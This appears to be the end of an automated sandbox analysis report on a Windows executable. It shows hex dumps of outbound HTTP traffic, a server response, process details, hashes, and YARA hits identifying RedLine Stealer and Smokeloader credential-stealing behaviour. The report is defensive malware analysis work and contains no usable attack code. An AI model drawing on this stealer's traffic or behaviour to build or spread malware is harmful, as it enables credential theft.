                                                                                              2024-12-18 19:54:39 UTC15331OUTData Raw: e2 8c 2f 4e 46 e8 06 91 af 90 9b 56 54 a8 e5 3b c6 3c 22 94 c8 d0 ad 79 57 3e be eb 97 1c 46 95 9e 29 4d 72 cc dc c9 37 f9 2e 2b 79 54 6b 73 0a 7a 79 d2 da 84 2f 6d 6f d2 9e e6 8b 27 6a eb 23 1d 01 22 36 d3 6b f9 2c 26 ab 95 a1 82 ff 15 6c 88 74 dc 19 d9 ed 3a 3b 2e b3 bc b8 58 22 28 42 db cf 97 a7 03 fa 26 9e 46 52 1c 3a 26 48 0b 9b be ed c2 17 5f 63 27 58 45 9d 51 20 59 3b b1 ad 37 76 c0 a6 4d a4 bb e8 63 8f 65 88 a3 50 3d 23 bf 75 cb 0e 7c 39 20 92 4e 88 5b 78 2e 8e 8a d9 81 4b 8f 2e cd 5e 58 c1 25 13 72 d6 d7 99 ff 70 d9 c0 9a 27 53 ab c7 ae 18 e2 c5 f2 f2 c8 30 13 5e 2a ed 79 b7 d2 a3 af 64 3b 48 f1 dc 3c 8b 77 08 99 a9 f6 5a d9 02 5b 85 37 f8 89 df ae 80 5b af 32 75 81 ce 72 b3 7f 05 52 66 ee b3 27 b5 f3 38 d1 9c 60 ea 14 98 59 6f ca 0f 0e f1 b5 6c
                                                                                              Data Ascii: /NFVT;<"yW>F)Mr7.+yTkszy/mo'j#"6k,&lt:;.X"(B&FR:&H_c'XEQ Y;7vMceP=#u|9 N[x.K.^X%rp'S0^*yd;H<wZ[7[2urRf'8`Yol
                                                                                              2024-12-18 19:54:39 UTC15331OUTData Raw: dd f2 fd 8a 0d 26 78 4d 6f 70 96 51 1e eb dd 3e 90 35 b8 38 91 6e 99 18 42 13 62 b4 b7 5c d6 ee 5f ac 09 70 af 9a be 42 25 ae 77 a1 ab 03 c2 44 c3 62 82 9b 64 d2 9b 0d 0b 7a 9a 43 e7 45 88 4b bf 0c 6b 6c a8 63 26 1c 05 12 11 ae 3a d7 50 28 79 b7 67 6a 5f f8 78 19 20 6b 25 d4 35 1c fe cf 46 fd 9f b2 0e 9d c7 69 43 48 01 d4 1e 1a 31 8e 90 a4 4d b9 b6 cc c9 bb b3 11 ee 73 a0 e9 17 ee a6 44 8d 63 30 b4 f9 d3 ad b8 00 e9 06 c3 63 cf 21 de 0f dc 14 01 67 45 69 ff f0 9c 5d d8 ad ef bc e4 74 9b 95 cd 5f 8e f9 0f 80 bf 31 8c f1 f6 54 3f c9 4c 89 ba 61 55 f9 08 1e 0f 82 54 84 0f 00 eb 14 58 57 b2 d5 d7 dc 04 36 8d 0e f1 c1 ec df 35 a0 05 ee e3 da 5b a1 57 72 b8 33 53 36 92 0a 5d 39 da 50 a6 64 44 a1 88 7e 53 44 47 6b f0 68 16 be af 08 34 1e 09 3c cb 47 48 7b 59 7f
                                                                                              Data Ascii: &xMopQ>58nBb\_pB%wDbdzCEKklc&:P(ygj_x k%5FiCH1MsDc0c!gEi]t_1T?LaUTXW65[Wr3S6]9PdD~SDGkh4<GH{Y
                                                                                              2024-12-18 19:54:39 UTC15331OUTData Raw: ad fe 24 9b 58 8a 54 6b 71 da 83 71 cc a8 40 0b 48 b8 9f b0 bd 1c 8b f4 b9 bf 60 8a 30 92 f4 c7 ad ef 11 17 7e ad 80 17 ee b3 2d b0 ef be 18 61 b8 cd 7a 91 ef a9 a3 db 46 c9 f2 95 34 ae 8d 5f 01 98 01 dd 7e ea 35 6d e6 16 97 09 62 77 89 d6 df 95 8b 11 25 ea 3b ca 10 5e 27 0e c1 02 bf 3a 7f 5b aa c6 39 8b 4b f7 19 84 5f 7f ad c8 13 63 07 a5 28 3c 43 0c a7 c6 7a 73 88 59 69 29 dc fe 23 f8 e6 a3 b0 21 96 bd 77 d2 78 ca e3 f6 d7 81 57 ab 05 ad 37 d8 10 22 81 70 c0 0d 0d 2e 87 5e 98 8f f9 99 82 02 9d 26 91 5e 23 ee 77 41 61 d8 60 7f 39 af 3d 51 72 1e 8c fe c7 e8 e2 15 c0 85 1b 35 32 e7 d2 96 6f 84 5d 49 8a 57 f8 6a 02 48 8d b1 95 f9 b6 bf 67 7e 0c d3 cf af be 3b 75 59 a6 53 d7 a9 24 f7 9b ad c4 39 01 fc d5 56 51 bb c7 7b 68 b4 9f f1 7e a3 6a 63 6b 73 ba 9c da
                                                                                              Data Ascii: $XTkqq@H`0~-azF4_~5mbw%;^':[9K_c(<CzsYi)#!wxW7"p.^&^#wAa`9=Qr52o]IWjHg~;uYS$9VQ{h~jcks
                                                                                              2024-12-18 19:54:39 UTC15331OUTData Raw: 14 9c d3 cf 87 0b 2f 5f b2 b2 37 05 29 83 89 33 e3 09 c3 61 32 11 ce a0 e9 07 54 bd cd 52 ba 37 ea cc 17 e1 8e 0d 74 a4 b0 e8 19 04 9c 05 53 58 9c ec 3c 3c 6a 42 fd 83 8a 8b 93 f9 95 63 78 7b 67 e7 c6 83 35 d9 52 e0 e0 83 a8 8b c7 7b ea ac fe 1e 71 9e 26 9b 1d ad 1e 8f f7 95 81 a9 f7 70 ad 23 02 29 5c 86 e2 4d ad 0f 3f 0b 6a cf 97 81 9e 2b 31 4a 0c 7b e0 c4 57 48 bc 3b 56 57 f4 2d 53 1b 61 a5 6f af 89 d7 4f b0 ac e0 cb 09 71 2c 79 77 79 35 ad 82 fa 74 a2 bc ed 7a 21 2e bc 18 35 76 41 82 aa 97 da 3e 17 1b 43 4d 93 b0 0f a0 aa 6c 7a b8 1a 86 a6 47 05 f8 2d cc 9d 9e 59 90 9f 02 c7 49 f6 63 aa ca 0c 05 c3 56 c5 28 8d 59 54 cb b3 11 07 af f5 42 74 d4 d1 a6 58 ef dd d8 05 e5 60 42 b7 f0 aa 23 07 f1 5b ac e6 28 ff 6e 54 c8 f5 8c dd 78 03 8b 16 a3 82 ab 2b 18 de
                                                                                              Data Ascii: /_7)3a2TR7tSX<<jBcx{g5R{q&p#)\M?j+1J{WH;VW-SaoOq,ywy5tz!.5vA>CMlzG-YIcV(YTBtX`B#[(nTx+
                                                                                              2024-12-18 19:54:39 UTC15331OUTData Raw: 6a 02 f7 d9 32 33 5a 85 df 5f 5e ee 1b b0 5e 1c 62 06 aa da 50 ac 72 15 d0 ba 00 68 0c 1c 94 78 45 15 b0 43 0e 94 dc 2c b5 a0 7d b7 05 e0 e3 06 77 58 49 8f ce 9f 6c eb 7f 57 6e 17 84 97 f3 64 7d c3 c8 f5 42 aa ad bd 90 93 65 f0 65 0b 1c 11 d0 fa 37 9d 12 5d e9 df b6 47 07 ac bc 3a af 67 c2 7f 3f 72 62 9b 0c 47 27 d4 e3 9f f0 19 55 dd 1f 63 61 04 d0 58 37 f3 19 c9 fa 06 41 ff f7 64 e0 2f 7f cf b2 86 73 8f 2b 62 88 c6 37 28 da 86 11 c2 3b 59 b6 53 1c 74 6d 3d 72 8d 20 87 3c 4d 72 8e 93 da b4 66 95 ba 23 db 91 7c ff 4e ee 97 2c 12 95 ca 8d c7 a3 bc 2a 89 8a 0d a2 b5 e9 a7 bc 5d bb e3 3b 55 e4 f2 5a c2 4b 9a 07 9a 6e d9 fc 3d df 1e a5 d7 32 5c 27 4d 68 88 a8 e1 cf a7 e0 a0 3f 36 ac ee c3 ca c0 68 d7 0b 12 9b fa b4 ee 0f 60 53 ce b2 60 98 84 98 dc 37 6b 57 ec
                                                                                              Data Ascii: j23Z_^^bPrhxEC,}wXIlWnd}Bee7]G:g?rbG'UcaX7Ad/s+b7(;YStm=r <Mrf#|N,*];UZKn=2\'Mh?6h`S`7kW
                                                                                              2024-12-18 19:54:45 UTC1042INHTTP/1.1 200 OK
                                                                                              Date: Wed, 18 Dec 2024 19:54:45 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=j5vegmvqa2s52q3mii40iqvm0d; expires=Sun, 13-Apr-2025 13:41:21 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=552RpzpYLcXszUjz7U7W%2BnKYpSMRf2eQTkqtEIHo6fbHTRl31XNZ3aSdOgky%2Bt9IfUxGxUd2SKtRykjzjAIabxvERkCC5GNkyJKbYnjVmWyjEHPOICst67vlUfQ350vq5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f41b4bc9d108c5f-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1965&min_rtt=1957&rtt_var=750&sent=202&recv=591&lost=0&retrans=0&sent_bytes=2833&recv_bytes=571295&delivery_rate=1443400&cwnd=171&unsent_bytes=0&cid=f51707b11bb2f167&ts=6282&x=0"


                                                                                              Statistics

                                                                                              CPU Usage

                                                                                              Click to jump to process

                                                                                              Memory Usage

                                                                                              Click to jump to process

                                                                                              High Level Behavior Distribution

                                                                                              Click to dive into process behavior distribution

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              General

                                                                                              Target ID:0
                                                                                              Start time:14:54:11
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Users\user\Desktop\k6A01XaeEn.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\k6A01XaeEn.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:368'640 bytes
                                                                                              MD5 hash:FD5FE344FEF63284ED51951698535FCA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2340966551.0000000000A79000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1940934471.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1940699958.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2340676868.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:6
                                                                                              Start time:14:54:46
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7736 -s 1672
                                                                                              Imagebase:0xe60000
                                                                                              File size:483'680 bytes
                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Disassembly

                                                                                              No disassembly